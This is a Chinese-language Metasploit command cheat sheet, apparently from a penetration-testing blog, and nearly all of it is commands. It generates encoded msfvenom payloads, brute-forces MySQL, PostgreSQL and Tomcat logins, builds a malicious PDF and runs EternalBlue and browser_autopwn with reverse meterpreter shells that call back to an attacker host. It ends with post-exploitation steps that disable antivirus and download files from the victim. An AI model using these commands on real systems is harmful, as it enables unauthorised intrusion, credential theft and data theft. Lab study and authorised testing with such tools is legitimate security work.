msfvenom -l encoders #查看支持的所有编码 msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.29.137 --platform windows -a x86/shikata_ga_nai -f exe > msf.exe
攻击范例
MySQL数据库服务
1 2 3 4 5 6
use auxiliary/scanner/mysql/mysql_login show options set RHOST 192.168.29.137 set USER_FILE /root/users.txt uset USERPASS_FILE /root/passwords.txt exploit
PostgreSQL数据库服务
1 2 3 4
use auxiliary/scanner/postgres/postgres_login show options set RHOSTS 192.168.29.137 exploit
PDF文件攻击
1 2 3 4 5
use exploit/windows/fileformat/adobe_pdf_embedded_exe show options set FILENAME test.pdf set INFILENAME /root/evil.pdf exploit
MS17_010
1 2 3 4 5 6 7 8 9 10 11 12 13 14
search ms17-010 use auxiliary/scanner/smb/smb_ms17_010 #漏洞扫描模块 set RHOST 192.168.29.143 exploit #发现存在漏洞 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp show options set RHOST 192.168.29.143 set LHOST 192.168.29.134 exploit #进入meterpreter会话 shell #进入目标主机cmd background #将meterpreter会话置于后台 回到MSF会话 sessions #查看所有会话 sessions -i 1 #回到1号会话
Shodan搜索
搜索匹配iomega关键字的所有信息。
1 2 3 4
use auxiliary/gather/shodan_search set SHODAN_APIKEY API密钥 set QUERY iomega run
想更多结果或使用过滤关键字,得交钱。
Tomcat服务
1 2 3 4 5 6 7 8
search tomcat use auxiliary/scanner/http/tomcat_mgr_login show options # set PASS_FILE 设置密码文件 默认自带tomcat_mgr_default_pass.txt # set USER_FILE 设置用户名文件 默认自带tomcat_mgr_default_users.txt set RHOSTS 192.168.41.142 set RPORT 8180 exploit
Telnet
1 2 3 4
use auxiliary/scanner/telnet/telnet_version show options set RHOST 192.168.6.105 exploit
Samba服务
1 2 3 4
use auxiliary/scanner/smb/smb_version show options set RHOSTS 192.168.6.105 exploit
扫描网络内开启Samba服务器的所有主机:
1 2 3 4 5
use auxiliary/scanner/smb/smb_version show options set RHOSTS 192.168.6.0/24 set THREADS 255 exploit
攻击浏览器
用户访问一个Web页面时自动入侵,只支持IE7
1 2 3 4 5 6 7
search autopwn use auxiliary/server/browser_autopwn set payload windows/meterpreter/reverse_tcp show options set LHOST 192.168.41.234 set URIPATH "filetypes" exploit
run killav #关闭杀毒软件 sysinfo #获取主机信息 run scraper #获取主机详细信息 并以.reg文件形式下载 run post/windows/gather/checkvm #查看是否运行虚拟机 pwd #查看当前工作目录 ls #查看当前目录文件 rm desktop.ini #删除文件 cd .. #切换工作目录 mkdir test #创建test目录 download Pictures upload /root/passwords.txt